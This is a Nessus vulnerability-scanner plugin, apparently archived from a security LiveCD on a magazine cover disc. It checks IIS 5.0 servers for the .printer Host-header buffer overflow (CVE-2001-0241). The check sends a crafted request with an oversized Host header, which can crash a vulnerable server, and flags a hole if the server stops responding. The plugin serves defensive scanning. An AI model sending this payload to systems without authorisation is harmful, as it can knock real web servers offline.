home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / iis5_printer.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  92 lines

  1. #
  2. # This script was written by John Lampe...j_lampe@bellsouth.net
  3. #
  4. #
  5. # See the Nessus Scripts License for details
  6. #
  7.  
  8. if(description)
  9. {
  10.  script_id(10657);
  11.  script_bugtraq_id(2674);
  12.  script_version ("$Revision: 1.21 $");
  13.  script_cve_id("CVE-2001-0241");
  14.  name["english"] = "NT IIS 5.0 Malformed HTTP Printer Request Header Buffer Overflow Vulnerability";
  15.  
  16.  
  17.  script_name(english:name["english"]);
  18.  
  19.  desc["english"] = "
  20. There is a buffer overflow in the remote IIS web server.  
  21. It is possible to overflow the remote Web server and execute 
  22. commands as the SYSTEM user.
  23.  
  24. At attacker may make use of this vulnerability and use it to
  25. gain access to confidential data and/or escalate their privileges
  26. on the Web server.
  27.  
  28. See http://www.eeye.com/html/Research/Advisories/AD20010501.html 
  29. for more details.
  30.  
  31. Solution: See http://www.microsoft.com/technet/security/bulletin/ms01-023.mspx
  32.  
  33. Risk factor : High";
  34.  
  35.  script_description(english:desc["english"]);
  36.  
  37.  # Summary
  38.  summary["english"] = "Tests for a remote buffer overflow in IIS 5.0";
  39.  script_summary(english:summary["english"]);
  40.  
  41.  # Category
  42.  script_category(ACT_DESTRUCTIVE_ATTACK);
  43.  
  44.  # Dependencie(s)
  45.  script_dependencie("find_service.nes", "http_version.nasl", "www_fingerprinting_hmap.nasl");
  46.  
  47.  # Family
  48.  family["english"] = "Gain root remotely";
  49.  family["francais"] = "Passer root α distance";
  50.  script_family(english:family["english"],
  51.                francais:family["francais"]);
  52.  
  53.  # Copyright
  54.  script_copyright(english:"This script is Copyright (C) 2001 John Lampe",
  55.                   francais:"Ce script est Copyright (C) 2001 John lampe");
  56.  
  57.  script_require_ports("Services/www", 80);
  58.  exit(0);
  59. }
  60.  
  61. # The attack starts here
  62.  
  63. include("http_func.inc");
  64.  
  65.  
  66. port = get_http_port(default:80);
  67.  
  68.  
  69. sig = get_kb_item("www/hmap/" + port + "/description");
  70. if ( sig && "IIS" >!< sig ) exit(0);
  71.  
  72. if(get_port_state(port)) {
  73.     if(http_is_dead(port:port))exit(0);
  74.     
  75.     mystring = string("GET /NULL.printer HTTP/1.1\r\n");
  76.     mystring = string (mystring, "Host: ", crap(420), "\r\n\r\n");
  77.     mystring2 = http_get(item:"/", port:port);
  78.     soc = http_open_socket(port);
  79.     if(!soc) {exit(0);}
  80.     else {
  81.       send(socket:soc, data:mystring);
  82.       r = http_recv(socket:soc);
  83.       http_close_socket(soc);
  84.       
  85.       if(http_is_dead(port:port))
  86.       {
  87.         security_hole(port);
  88.         exit(0);
  89.       }
  90.     }
  91. }
  92.